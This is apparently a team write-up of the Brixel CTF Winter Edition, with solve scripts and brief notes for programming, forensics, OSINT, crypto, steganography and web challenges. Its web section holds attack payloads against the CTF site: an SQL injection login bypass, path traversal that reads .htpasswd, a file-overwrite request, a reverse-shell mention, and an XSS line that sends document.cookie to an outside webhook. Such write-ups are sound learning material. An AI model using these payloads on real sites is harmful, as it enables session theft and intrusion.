Try   HackMD

Brixel CTF Winter Edition

Programming

Are you fast enough?

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

solve.sh

#!/bin/bash curl -s http://timesink.be/speedy/ -X POST -d inputfield=$(curl -s http://timesink.be/speedy/index.php -c cookie.txt | grep -oP '(?<=div id="rndstring" align="center">).*(?=<\/div><br>)' | tr -d "\n" | tr -d -) -b cookie.txt

./solve.sh

<html><body><div align="center"><h1>Are you fast enough?</h1></div><hr><div align="center">You took: 0 second(s) to complete the task.</div><br><div align="center">Congratulations, you completed the task in under 1 seconds!</div><div algin="center">The flag is: <b>brixelCTF{sp33d_d3m0n}</b></div></body></html>%

solve.py

import requests import re t = "http://timesink.be/speedy" s = requests.Session() print(f"Requesting {t}...") req = s.get(t) p = re.compile('<div id="rndstring" align="center">(\w*)</div>') random_str = p.search(req.text).group(1) print(f"Got randomstring: {random_str}") print(f"Posting...") r2 = s.post("http://timesink.be/speedy/index.php", data={"inputfield": random_str}) print(r2.text)

brixelCTF{sp33d_d3m0n}

Keep walking

solve.py

x = 1 y = 1 previous_answer = 1 answer = x * y + previous_answer + 3 while (x < 525): x = x + 1 y = y + 1 previous_answer = answer answer = x * y + previous_answer + 3 print ("answer="+str(answer)) print ("previous_answer="+str(previous_answer)) print ("x="+str(x)) print ("y="+str(y)) print ("formula: "+str(answer)+"="+str(x)+"*"+str(y)+"+"+str(previous_answer)+"+"+"3")
x = 1 y = 1 prev_answer = 1 answer = None while x <= 525: answer = x*y + prev_answer + 3 print(f"{x = } ==> {answer = }") x += 1 y += 1 prev_answer = answer

brixelCTF{48373851}

A song

Copy the song and paste into https://codewithrockstar.com/online

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

brixelCTF{5667236346614}

An arduino project

Quizbot

import requests
import json
from bs4 import BeautifulSoup as bs4

################################################################################
#
# Stage 1:
# 
# Request a session for the first "round", in this, we'll submit a lot of wrong
# answers and store the resulting solution given to us by the server. The plan
# is to use this solutions in a second round to solve the questions
#
########################################

# question_mapping maps the question to it's answer
# load the stored data
question_mapping = {}
with open("solutions.json") as data:
    question_mapping = json.load(data)

s1 = requests.Session()
s1.close()
s1 = requests.Session()

#for i in range(0, 2000):
i=0
while len(question_mapping) < 1000:
    print(f"\r{i}\t{len(question_mapping)}", end="", flush=True)
    r = s1.get("http://timesink.be/quizbot/index.php")
    soup = bs4(r.text, "html.parser")
    question = soup.h4.text

    # post with body:
    payload = {"insert_answer": "asdfghjkl", "submit": "answer"}
    r = s1.post("http://timesink.be/quizbot/index.php", data=payload)
    soup = bs4(r.text, "html.parser")
    answer = soup.find(id="answer").text

    question_mapping[question] = answer
    i+=1

# save the dict to json
with open("solutions.json", "w") as outfile:
    json.dump(question_mapping, outfile)

print("")

################################################################################
#
# Stage 2:
#
# Use the solutions collected in stage 1
#
########################################

s2 = requests.Session()

for i in range(0, 1100):
    try:
        r = s1.get("http://timesink.be/quizbot/index.php", timeout=10)
        soup = bs4(r.text, "html.parser")
        question = soup.h4.text
        try:
            answer = question_mapping[question]
        except:
            answer = "abc"
        print(question)
        print(answer)
    except:
        print("SOME ERROR OCCURED")

    try:
        # post with body:
        payload = {"insert_answer": answer, "submit": "answer"}
        r = s1.post("http://timesink.be/quizbot/index.php", data=payload, timeout=10)
        soup = bs4(r.text, "html.parser")
        print(r.text)
        #answer = soup.find(id="answer").text
    except:
        print("SOME ERROR OCCURED")

brixelCTF{kn0wl3dg3}

Forensics

Message from Space

https://ourcodeworld.com/articles/read/956/how-to-convert-decode-a-slow-scan-television-transmissions-sstv-audio-file-to-images-using-qsstv-in-ubuntu-18-04

Download the app > Robot32 - SSTV Image Decoder
Listen the wav file and wait for the render image

SSTV in Scottie1-Mode

brixelCTF{SP4C3L4B}

Lottery Ticket

  • Picture of lottery ticket
  • If you zoom in you see compression artifacts around most numbers
  • Edited numbers got none, sum them together > Flag is "203"

brixelCTF{203}

Lost evidence

foremost extract .wav
decode the dtmf in the wave file
you get the transaction reason
cocaine

brixelCTF{cocaine}

OSINT

Visit Limburg #1

https://www.google.com/maps/d/viewer?mid=13WdFG3f5N8YGKQ6tTO4XTcxZlwFZ2Dgq&ll=50.693156402179554%2C5.707086178620777&z=16

Visit Limburg #2

3.05.13

7.05.09
https://www.google.com/maps/@50.9409526,5.4027559,3a,32.9y,53.72h,88.17t/data=!3m7!1e1!3m5!1spIOYm_3knO82AWp-QKjpBg!2e0!5s20130601T000000!7i13312!8i6656

Visit Limburg #3

https://www.openstreetmap.org/search?query=airport in limburg#map=11/51.0996/5.4437

Physical

https://www.bipt.be/operators/publication/database-with-reserved-and-allocated-numbers

https://osintframework.com/

Google Lens o Yandex images

Eben-Ezer Tower

brixelCTF{Eben-Ezer}

Manhunt (1-n)

Facts:

  1. Johnny Dorfmeister: Taken from the EXIF-data of the image

  2. pishapasha: Googling the name takes you to this Linkedin-profile: https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/

  3. fav food: macaroni
    Taken from https://www.instagram.com/JohnnyDorfmeister/

  4. bday: tbd

  5. w@yb@ck!: Using the wayback-machine: https://web.archive.org/web/20190115103029/http://www.howitshould.be/test-page/ (Taken from his twitter-account @johnnydorfmeis1)

  6. poetry: Translate the russian text on howitshould.be with google.

  7. Fill in the contact form and his address will be presented

  8. "just_married": With google street view on the address from no. 7, move back in time

  9. g1ttern00b: Username "johnny", Password "letmein" taken from old commit on github

Reverse Engineering / cracking

Cookieee!

Cheatengine
search for the cookie amount
increase it
done

noPEEKing

strings on the exe

registerme.exe

strings on exe
create a file called register.key
start the exe

android app

Old tech

punchcard

uploda the punchcard here:
https://www.masswerk.at/cardreader/

brixelCTF{M41NFR4M3}

Goodbye old friend

Download the SWF
Extract the content
then again
search through the files till you find the flag

The tape

Crypto

Sea code

message.wav

- .... . ..-. .-.. .- --. ..-. --- .-. - .... .. ... -.-. .... .- .-.. .-.. . -. --. . .. ... ... . .- --. ..- .-.. .-.. 

theflagforthischallengeis seagull

brixelCTF{seagull}

Merde

vigenere with "confidentiel" as the key:

The flag is 

brixelCTF{baguette}

Merda

rot 21

brixelCTF{pizzanapoli}

s̸͖̾̀͊͠h̸̜̒ï̷̧̲͙̭̤͛͒̋t̷̢̲͚͖̑͜

base64 decode + binary decode

brixelCTF{robocop}

Scheiße

qbhbh zrmua gfbld ocqbv

derflagistsauerkraut
the flag is sauerkraut

brixelCTF{sauerkraut}

flawed

Username:admin

Passwordhash:d269ce15f9c44bc3992a5f4e5f273e06

brixelCTF{notsecure}

Don't be salty

import hashlib for a in range(97, 122): for b in range(97, 122): for c in range(97, 122): for d in range(97, 122): for e in range(97, 122): pw = chr(a) + chr(b) + chr(c) + chr(d) + chr(e) pw += "04532@#!!" print(pw, hashlib.md5(pw.encode('utf-8')).hexdigest())

brixelCTF{brute}

Steganography

Doc-ception

unzip loremipsum.docx
unzip loremipsum
cat flag.txt
flag = openxml

brixelCTF{openxml}

Limewire audio

Audacity > Spectrogram

brixelCTF{hellokitty}

Scan Me

  • qr-code image
  • crop smaller qr-code image from first
  • go to website, scan barcode
  • enter result, scan next barcode, repeat
  • receive flag: brixelCTF{m4st3r_0f_sc4n5}

brixelCTF{m4st3r_0f_sc4n5}

Rufus the vampire cat

steghide info rufus.jpg

"rufus.jpg":
  format: jpeg
  capacity: 8.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "steganopayload639.txt":
    size: 85.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

steghide extract -sf rufus.jpg

Enter passphrase: 
wrote extracted data to "steganopayload639.txt".

less steganopayload639.txt

You thought this was a cute cat picture? NOPE! Chuck Testa! (the flag is:
chucktesta)

brixelCTF{chucktesta}

Internet

Easy

curl -s https://ctf.brixel.space/ | grep -i flag
        <!-- hidden flag: 'brixelCTF{notsosecret}' -->

brixelCTF{notsosecret}

Discord

5: Reading the rules gets you this flag: brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}

brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}

Hidden Code

https://www.brixel.be/

View page source code and find konami

/* <![CDATA[ */ var wpee_config = {"type":"konami","custom_code":"9","action":"move_image_across_middle","custom_js":"alert('test');","image":"http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif"}; /* ]]> */

http://brixel.be/wp-content/uploads/2016/10/15908854_90x90.png.gif

brixelCTF{Mario}

Hiding in the background

<style> body{color: #FFFFFF; background-color: #000000; background-image: url("/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg"); background-repeat: repeat; background-size: 50%;} </style>

wget https://ctf.brixel.space/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg

strings ctfbg.svg | grep -i ctf
sodipodi:docname="ctfbg.svg">
style="fill:#000000;fill-opacity:1;stroke-width:0.264583">brixelCTF{happy_holidays}

brixelCTF{happy_holidays}

Readme

https://ctf.brixel.space/guide

brixelCTF{freepoints}

robotopia

http://timesink.be/robotopia/robots.txt

brixelCTF{sadr0b0tz}

login1

plain text in javascript source

brixelCTF{w0rst_j4v4scr1pt_3v3r!}

login2

function verify() { password = "brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}" split = 6; if (password.substring(0, split) == 'brixel') { if (password.substring(split*6, split*7) == '180790') { if (password.substring(split, split*2) == 'CTF{st') { if (password.substring(split*4, split*5) == '5cr1pt') { if (password.substring(split*3, split*4) == 'd_j4v4') { if (password.substring(split*5, split*6) == '_h3r3.') { if (password.substring(split*2, split*3) == '1ll_b4') { if (password.substring(split*7, split*8) == '54270}') { console.log("Password Verified") } } } } } } } } else { console.log("Incorrect password"); } } verify()

brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}

login3

http://timesink.be/login3/password.txt

brixelCTF{n0t_3v3n_cl05e_t0_s3cur3!}

login4

http://timesink.be/login4/password.txt + base64 decode

brixelCTF{even_base64_wont_make_you_secure}

login5

function verify() {
    var _0x41653e = _0x58ab;
    password = document[
        _0x41653e(0x194)
    ](_0x41653e(0x192))['value'],
    alphabet = _0x41653e(0x193),
    newpassword = alphabet['substr'](0x1, 0x1), // b
    newpassword = newpassword + alphabet['substr'](0x11, 0x1), // r
    newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
    newpassword = newpassword + alphabet['substr'](0x17, 0x1), // x
    newpassword = newpassword + alphabet['substr'](0x4, 0x1), // e
    newpassword = newpassword + alphabet['substr'](0xb, 0x1), // l
    newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
    newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
    newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
    newpassword = newpassword + alphabet['substr'](39 - 0x2, 0x1), // {
    newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1),  // 0
    newpassword = newpassword + alphabet['substr'](0x1, 0x1), // b
    newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
    newpassword = newpassword + alphabet['substr'](0x14, 0x1), // u
    newpassword = newpassword + alphabet['substr'](0x12, 0x1), // s
    newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
    newpassword = newpassword + alphabet['substr'](0x0, 0x1), // a
    newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
    newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
    newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0
    newpassword = newpassword + alphabet['substr'](0xd, 0x1), // n
    newpassword = newpassword + alphabet['substr']39 - 0x1, 0x1), // }
    password == newpassword ? alert(_0x41653e(0x196)) : alert(_0x41653e(0x195));
}

brixelctf{0bfuscati0n}

Browsercheck

Google search to identify user-agent used by "ask jeeves crawler"
curl 'http://timesink.be/browsercheck/' -H 'User-Agent: Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)'

<html><body><div align="center"><h1>congratulations</h1>the flag is 'brixelCTF{askwho?}'</div></body></html>

brixelCTF{askwho?}

SnackShack awards

curl 'http://timesink.be/snackshackaward/stemmen.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://timesink.be' -H 'Connection: keep-alive' -H 'Referer: http://timesink.be/snackshackaward/index.html' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'score_bammens=0&score_omejan=0&score_fontainas=0&score_tpleintje=5000&score_frietuurtje=0'

brixelCTF{bakpau}

Flat earth

brute force usname and login here: http://timesink.be/flatearth/admin.php

' OR ''=' --

brixelCTF{aroundtheglobe}

Dadjokes

Upload reverse shell here:
http://timesink.be/dadjokes/jokes/submit.php

File Read:
http://timesink.be/dadjokes/jokes/read.php?file=mugged.txt

http://timesink.be/dadjokes/jokes/submit.php?filename=%3C?php%20echo%20\

Notice: Undefined index: title in /home/kevinay5/domains/timesink.be/public_html/dadjokes/jokes/submit.php on line 47
please provide a title

The Solution is to fix the Page. This gives you the solution

curl 'http://timesink.be/dadjokes/jokes/submit.php?filename=../index.html&title=index&submit=true&content=%0D%0A%3Chtml%3E%3Ctitle%3EDadJokes%2C+your+source+of+lame+dad+jokes%3C%2Ftitle%3E%3Cbody%3E%3
Cdiv+align%3D%22center%22%3E%3Ch1%3EDadJokes%3C%2Fh1%3E%3Chr%3E%3Cimg+src%3D%22images%2Fbanner.png%22+alt%3D%22dadjokes%22%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fread.php%22%3ERead+dad+jokes%3C%2Fa%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fsubmi
t.php%22%3Esubmit+your+own+jokes%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fhtml%3E'

document.write('<img src="https://webhook.site/#!/0129c597-c633-4ef5-b4bb-c2ee2a805adc?cookie=' + document.cookie + '" />')

Pathfinders #1

The index.php is used to load files without any limit, so only access:
http://timesink.be/pathfinder/index.php?page=admin/.htpasswd

brixelCTF{unsafe_include}

Pathfinders #2

The index.php is used to load files without any limit, so only access:
http://timesink.be/pathfinder2/index.php?page=admin/.htpasswd%00.php

brixelCTF{outdated_php}